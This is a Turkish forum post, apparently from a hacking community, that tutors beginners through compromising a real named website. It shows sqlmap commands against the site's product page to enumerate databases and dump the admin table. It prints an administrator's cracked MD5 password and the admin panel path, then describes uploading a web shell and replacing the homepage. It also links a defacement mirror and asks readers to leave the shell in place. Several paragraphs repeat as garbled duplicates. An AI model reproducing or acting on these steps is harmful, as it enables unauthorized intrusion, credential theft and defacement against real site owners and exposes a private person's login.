Merhabalar sizleri her yerde konu olmus teorik sql bilgileri vererek tutmak istemiyorum.
NOT:Yeni arkadaslar icin en temel ve anlasilir duzeyde anlatmak istiyorum.
Bu yuzden hemen icraata gecelim.Teorik olarak sqli anlayipta uygulayamayan yeni arkadaslarimiz icin faydali olur umarim.
//Hedef sitemiz:https://shogun.am/
Ilk adim sitede id degeri arayalim.
Ctrl u yapalim ve arama kutucuguna .php?id= yazalim.
Gordugunuz gibi id degeri olan urller onumuze cikti.Bunu admin paneli ararkende kullana bilirsiniz.NOT:Yeni arkadaslar icin en temel ve anlasilir duzeyde anlatmak istiyorum.
Bu yuzden hemen icraata gecelim.Teorik olarak sqli anlayipta uygulayamayan yeni arkadaslarimiz icin faydali olur umarim.
//Hedef sitemiz:https://shogun.am/
Ilk adim sitede id degeri arayalim.
Ctrl u yapalim ve arama kutucuguna .php?id= yazalim.
Her hangi birine girelim ve id degerinin sonuna tirnak isareti atalim.
Ve evet fotograf ve yazilar kayboldu.Burada sql injection mevcut.
Yeni baslayanlar icin manual olarak degilde sqlmap kullanarak db bilgilerini cekelim.
Komutlar
1 - sqlmap -u "https://shogun.am/product.php?id=1" --random-agent --dbs --batch
2- sqlmap -u "https://shogun.am/product.php?id=1" -D shogun --tablesYeni baslayanlar icin manual olarak degilde sqlmap kullanarak db bilgilerini cekelim.
Komutlar
1 - sqlmap -u "https://shogun.am/product.php?id=1" --random-agent --dbs --batch
3-sqlmap -u "https://shogun.am/product.php?id=1" -D shogun -T admin,users--columns
4-sqlmap -u "https://shogun.am/product.php?id=1" -D shogun -T admin -C users,admail,name --dump
gordugunuz gibi admin robert avetyan diye birisine ait.Gmail ile md5 sifreyi eslestirince avetyan isimli admine uygun geliyor.
db biraz karisik ama mantik yuruterek anlasiliyor.
Sitemizin admin panelini /admin.php /administrator /login.php diye deniyorum ve ilkine uygun geldigini goruyorum.
md5 sifremizi hashes.com sitesini kullanarak cozelim.
su anda resim upload sitelerinde problem ciktigi icin konuya gorselsiz devam ediyorum.
6b73be608d77388bb9bf90cf1f8e0d50:RoB&112358
sifremizi bulduk.
[email protected]
RoB&112358
yazarak admin paneline giris yapiyoruz ve ilk resim upload yerinden shellimizi atiyoruz.
buyurun shellimiz bu
httpdocs dizinine giderek index.php yi bulup duzenle diyoruz.
https://shogun.am/ ve sitemize indeximizi atiyoruz.
Shelli silmezseniz sevinirim.Arkadaslar uzerinde arastirma yapsin.
Iyi forumlar dilerim.
Mirrorumuzuda alalim degil mi ? https://ownzyou.com/zone/147171
Moderatör tarafında düzenlendi: